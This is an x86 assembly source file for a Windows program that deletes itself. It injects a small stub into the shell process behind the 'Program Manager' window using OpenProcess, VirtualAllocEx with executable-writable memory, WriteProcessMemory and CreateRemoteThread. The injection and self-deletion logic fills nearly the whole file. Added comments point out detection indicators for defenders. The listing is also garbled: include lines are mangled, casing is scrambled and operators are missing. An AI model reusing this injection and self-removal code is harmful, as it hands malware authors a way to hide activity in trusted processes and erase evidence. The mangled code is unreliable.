*********************************************************** ******; ml / c / coff / fo selfkill-rnt.obj selfkill-rnt.asm; link / subsystem: windows /section: horns ,wre selfkill-rnt.obj; ******* ************************************************************************************************** .MODEL FLAT, STDCALL OPTION CASEMAP: NONE
Include Windows.Include User32.incinCludelib user32.libinclude kernel32.includeLod kernel32.lib
*********************************************************** ******
.code
; Delete itself remote thread code
; ---------------------------------------------------------------------
; Self-contained stub that is copied out of this image and executed in
; another process (see _RemoteCode2KXP / start).  Its only job is to
; wait, then DeleteFileA the path stored directly after it.
;
; Layout, every offset relative to KREMOTE_CODE_START:
;   code                  call/pop delta trick, Sleep, DeleteFileA, ret
;   _lpselfkillsleep      dd  address of Sleep, filled in by `start`
;   _lpselfkillDeletefile dd  address of DeleteFileA, filled in by `start`
;   _SelfkillSelfname     label marking where the NUL-terminated image
;                             path is expected to follow the copied stub
;
; The two API addresses are resolved in *this* process and reused as-is
; in the target, so they are only valid while kernel32.dll is mapped at
; the same base in both processes (the "2K/XP" era assumption behind the
; proc name).  The `dd ?` slots live inside .code, so `start` can only
; write them if the code section is writable — presumably what the link
; options in the file header arrange; confirm against the build line.
;
; Defender note: the stub runs from memory that belongs to no loaded
; module; a thread whose start address is outside any image, created by
; a process that then exits, is a standard EDR / memory-scan indicator.
KREMOTE_CODE_START EQU this BYTE
        CALL @f                         ; pushes the address of @@
@@:     pop ebx                         ; ebx = run-time address of @@
        sub ebx, offset @B; repositioning
                                        ; ebx = run-time base - link-time base;
                                        ; added to every link-time offset below
        Push 500
        Call [EBX _LPselfkillsleep]     ; Sleep(500): assumes the originating
                                        ; process has exited by then so the
                                        ; image file is no longer locked
                                        ; NOTE(review): the `+` between EBX and
                                        ; the symbol appears lost in this listing
        Lea Eax, [EBX Offset _SelfkillSelfname]
        Push Eax
        Call [EBX _LPSELFKILDELETEFILE] ; DeleteFileA(self path); result unused
        RET                             ; remote thread returns and ends
_lpselfkillsleep dd?
_lpselfkillDeletefile DD?
_SelfkillSelfname:                      ; same offset as KREMOTE_CODE_END
KREMOTE_CODE_END equ this byte
KREMOTE_CODE_LENGTH equ offset KREMOTE_CODE_END - offset KREMOTE_CODE_START
; *************************************** *****************
.DATA?
; Uninitialised staging area for the injected blob.
; REMOTE_CODE and SZSELFNAME must stay adjacent and in this order:
; `start` copies the stub into REMOTE_CODE, GetModuleFileName writes the
; image path straight after it into SZSELFNAME, and both are then
; written to the target as one KREMOTE_CODE_LENGTH + MAX_PATH byte blob,
; which is how the stub's _SelfkillSelfname label lines up with the path.
REMOTE_CODE DB KREMOTE_CODE_LENGTH DUP (?)
SZSELFNAME DB MAX_PATH DUP (?)
.code
*********************************************************** ******
; Used to insert Remote Thread
; Window class and title of the shell's desktop window.  _RemoteCode2KXP
; passes this pair to FindWindow to pick the host process for the stub.
; Defender note: these two literals together are a cheap static
; indicator for this injection pattern.
Szdesktopclass DB 'Progman', 0
SZDeskTopWindow DB 'Program Manager', 0
;-----------------------------------------------------------------------
; _RemoteCode2KXP(_rmCodeStart, _rmCodeLen)   (STDCALL, two dword args)
; Copies _rmCodeLen bytes from _rmCodeStart into the process that owns
; the "Program Manager" desktop window and starts a thread on the copy.
; Out:   nothing meaningful (eax holds the last CloseHandle result)
; Locals: @hRmCodeMemory      remote buffer returned by VirtualAllocEx
;         @hSelfKillProcessID pid written by GetWindowThreadProcessId
;         @hSelfKillProcess   handle from OpenProcess
; Only the VirtualAllocEx result is tested; FindWindow, OpenProcess,
; WriteProcessMemory and CreateRemoteThread results are used unchecked,
; so a missing window or refused open just runs through with NULL/garbage.
; The remote allocation is never freed: the injected thread runs from it.
; Defender note: the sequence OpenProcess(CREATE_THREAD|VM_OPERATION|
; VM_WRITE) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory
; -> CreateRemoteThread into the shell process is the textbook injection
; telemetry chain; each step is an API-level detection point.
;-----------------------------------------------------------------------
_Remotecode2kxp proc @_rmcodeestart, @ _ rmcodelen
local @hrmcodememory
local @HselfkillProcessid
local @HselfkillProcess
; Find File Manager window and get the process ID, and then open the process
        invoke FindWindow, addr szDesktopClass, addr szDesktopWindow
        lea ecx, @ hselfkillProcessID   ; eax = hwnd (NULL if not found, unchecked)
        invoke GetWindowThreadProcessId, eax, ecx
        invoke OpenProcess, PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or / PROCESS_VM_WRITE, FALSE, @ hselfkillProcessID
        mov @hselfkillProcess , eax     ; may be NULL; not validated
; in the process of allocating space and write remote code, to establish a remote thread
        invoke VirtualAllocEx, @ hselfkillProcess, NULL, @ _ RmCodeLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE
        .if eax                         ; only failure path that is handled
            mov @ hRmCodeMemory, eax
            invoke WriteProcessMemory, @ hselfkillProcess, eax, @ _ RmCodeStart , @ _ RmCodeLen, NULL
            xor eax, eax                ; NULL for attrs/stack size/param/flags/tid
            invoke CreateRemoteThread, @ hselfkillProcess, eax, eax, @ hRmCodeMemory, eax, eax, eax
            invoke CloseHandle, eax     ; drop the thread handle; thread keeps running
        .endif
        invoke CloseHandle, @ hselfkillProcess
        ret
_RemoteCode2KXP endp
; ********* ******************************************************
; Module and export names resolved by `start`; the stub does not resolve
; anything itself, it receives absolute addresses.
SZSELFKILLDKERNEL DB 'KERNEL32 .dll ', 0
szselfkillsleep DB "Sleep", 0
SZselfkillletefile DB "deletefilea", 0
;-----------------------------------------------------------------------
; start — program entry.
; 1. Resolve Sleep and DeleteFileA in this process and store the addresses
;    into the stub's slots (which live in .code, see the stub header).
; 2. Copy the stub into REMOTE_CODE and append this image's path by
;    writing GetModuleFileName output into the adjacent SZSELFNAME.
; 3. Hand the combined blob (stub + MAX_PATH) to _RemoteCode2KXP, then
;    return; with no ExitProcess call, process exit presumably happens
;    via the return to the loader's thread-start routine — confirm.
; The Sleep(500) in the stub is the only synchronisation with step 3:
; the design assumes this process has fully exited within that window.
; Defender note: a PE whose code section is writable (needed for step 1)
; is itself a static indicator worth flagging.
;-----------------------------------------------------------------------
start:
; an API addresses (hard-coded address)
        invoke GetModuleHandle, addr szselfkillDllKernel
        mov esi, eax                    ; esi = hKernel32
        invoke GetProcAddress, esi, offset szselfkillSleep
        mov _lpselfkillSleep, eax       ; store into the .code-resident slot
        invoke GetProcAddress, esi, offset szselfkillDeleteFile
        mov _lpselfkillDeleteFile, eax
; the remote code and its own address merged
        CLD                             ; rep movsb must copy forwards
        MOV ECX, KREMOTE_CODE_LENGTH
        MOV ESI, OFFSET KREMOTE_CODE_START
        MOV EDI, OFFSET Remote_code
        rep Movsb                       ; REMOTE_CODE = stub (with patched slots)
        Invoke getModuleFileName, Null, Offset Szselfname, Max_Path
        Push Kremote_code_length max_path
                                        ; NOTE(review): a `+` between the two
                                        ; operands appears lost in this listing
        push offset remote_code
        call _remotecode2kxp
        Ret
End Start